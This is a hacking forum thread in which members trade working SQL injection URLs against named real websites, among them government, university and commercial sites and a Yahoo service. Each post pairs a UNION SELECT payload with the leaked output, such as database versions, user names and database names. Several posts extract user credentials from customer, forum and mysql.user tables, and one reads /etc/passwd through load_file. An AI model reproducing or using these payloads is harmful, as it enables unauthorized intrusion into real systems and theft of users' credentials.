SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://www.youthsports.gov.mv/view_main_story.php?recordID=1+union+select+1,2,aes_decrypt(aes_encrypt(concat(0x2,version(),user(),database()),0x71),0x71),4,5,6/*

    [email protected]


    http://www.hb-show.de/index.php?page_id=63+union+select+concat_ws(0x3,version(),user(),database())


    4.1.22 10002_sismedia@localhost 10002_sismedia
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://gitarre.ru/index.php?mode=pages&id=-36+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8--

    [email protected]:u57821_gitarre:5.0.67-log
     
  3. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Code:
    http://www.kharkiv.com/index.php?s=1&bt=1&db=1&cl=1&cat_id=65%20and%201=2%20union%20select%201,version(),3,4,5+--+&page=1
    4.0.27
     
  4. Swift

    Swift Banned

    http://propel.ru/forum/see.php?id=1041+union+select+1,2,concat(0x2,version(),user(),database()),4,5,6,7,8,9,10,11+limit+1,1

    5.0.26-logpropeltu_propel@localhostpropeltu_propel
     
  5. DrAssault

    DrAssault Member

    Code:
    http://www.rosexport.biz/catalog.php?ID=-1'+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8+--+
    4.1.11-Debian_4sarge5-log
     
  6. Swift

    Swift Banned

    Code:
    http://www.touch-deco.fr/fiche-produit.php?id=65+union+select+1,concat_ws(0x2,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
    5.0.48 touch@localhost touch
     
  7. DrAssault

    DrAssault Member

    Code:
    http://www.blumenbar.de/buch.php?id=-3+union+select+1,concat(version(),0x2f2f2f,user(),0x2f2f2f,database()),group_concat(table_name+separator+0x0a),4,5,6,7+from+information_schema.tables+--+
     
  8. Swift

    Swift Banned

    Code:
    http://www.ifestival.fr/article.php?id=337+union+select+1,2,3,4,concat_ws(0x2a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18

    5.0.22 jbfontana @localhost frequencb
     
  9. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://www.wheelingwv.gov/forbusinesses.php?fid=-1+union+all+select+1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6
    database: cityofwheeling
    user: cowwv@localhost
    version: 4.1.22

    Code:
    http://www.sandiego.edu/EPIC/news/frontnews.php?id=null+union+select+1,version(),3,4,5,6--

    The anti-repost check isn't working, so don't kick me if anything is a duplicate :(

    jokester: Google works, though
     
    #10449 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
  10. DrAssault

    DrAssault Member

    Code:
    http://www.stengazeta.net/author.html?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(concat(id,'ll',fname,'ll',name,'ll',email,'ll',homepage)+separator+0x0a),14+from+persons/*
  11. Swift

    Swift Banned

    Code:
    http://www.lncygt.gov.cn/list.php?cid=1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9+limit+1,1
    4.0.21-standard-log:[email protected]:t101
     
  12. [underwater]

    [underwater] Member

    Code:
    http://www.dpe.edu.mv/dpe/news/view.php?news_id=0%20union%20all%20select%201,2,unhex%28hex%28@@version%29%29,4,5,6,7--
    Code:
    http://www.calendar.ilstu.edu/detail.taf?_function=detail&EventCategories_uid1=41&event_uid2=-1)+UNION+ALL+SELECT+1,2,3,SYSTEM_USER,@@version,6,7,8,9,10, @@SERVERNAME,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,user,41,user,43,user,45,user,46,47,48,49,50,51----
    Code:
    http://www.orienttouch.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers--
    Code:
    http://www.miss-internet.cz/content.php?pid=4&id=-72%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3A3A,%20version(),database(),user()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
    Code:
    http://www.sdp-usk.ba/news.php?id=-1+union+all+select+1,concat(user_level,0x3a,username,0x3a,user_password,0x3a,user_email),null,null,5,null,7,8+from+phpbb_users--
    Code:
    http://bangkhunthianjoggingclub.com/webboard_ans.php?id=1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9/*
     
    #10452 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
  13. ILYAtirtir

    ILYAtirtir Elder

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Time bank)))

    Time Banking UK
    Code:
    Microsoft SQL Server  2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) 
     
  14. [underwater]

    [underwater] Member

    Code:
    http://www.briancable.com/view.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18-
    assa.edu.au
    Code:
    http://www.assa.edu.au/programs/policy/paper.php?id=-1+UNION+ALL+SELECT+1,2,concat(email,0x3a,password),4,5,6,7,8,9,10+FROM+people
    Code:
    http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+FROM+mysql.user--
    Load_file:
    Code:
    http://www.niburu.nl/viewinstelling.php?id=-14+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9--
     
    #10454 [underwater], 25 Aug 2009
    Last edited by a moderator: 25 Aug 2009
  15. Swift

    Swift Banned

    Code:
    http://www.china-deaf.cn/vwd.php?id=1+union+select+1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8+limit+1,1
    4.0.27-log ztqlongxiao@localhost ztq_longxiao
     
  16. DrAssault

    DrAssault Member

    Code:
    http://www.tacheproduction.org/site/pages/expos.php?sup=-5+union+select+1,concat_ws(0x3a,id,login,pass),3,4,5+from+user/*
     
    #10456 DrAssault, 26 Aug 2009
    Last edited by a moderator: 26 Aug 2009
  17. diGriz

    diGriz Elder

    Joined:
    11 Oct 2006
    Messages:
    138
    Likes Received:
    82
    Reputations:
    6
    Code:
    http://tonitomov.com/products.php?id=-20+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15--
    tonitomo_sapove:5.0.81-community-log:tonitomo_tonitom@localhost

    Code:
    http://paintdecordiy.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7--
    d60204512:5.0.77-log:u70215489@cgihost
     
  18. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    Second SQL injection on Yahoo, and not the last one, IMHO))

    Since my thread was removed, I'll post it here:

    PR: 5

    Code:
    http://suggestions.yahoo.com/detail/?prop=realestate&fid=158954+and+1=0+union+select+0,0,0,unhex(hex(concat_ws(0x3a,version(),database()))),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--

    Version: 4.1.23-Yahoo-SMP-log
    Database: userfeedback
     
    #10458 mr.gr33n, 26 Aug 2009
    Last edited: 27 Aug 2009
  19. Swift

    Swift Banned

    Code:
    http://www.nbtb.gov.cn/homepage/view.php?id=3053&catid=2+union+select+1,2,concat(0x2,version(),user(),database())+limit+1,1
    4.1.21-standardnbtb@localhostnbtb
     
  20. DrAssault

    DrAssault Member

    Code:
    http://www.scaa.us/article.php?id=-4%20union%20select%201,2,3,4,5,concat_ws(0x3a3a3a,username,password)%20from%20users
     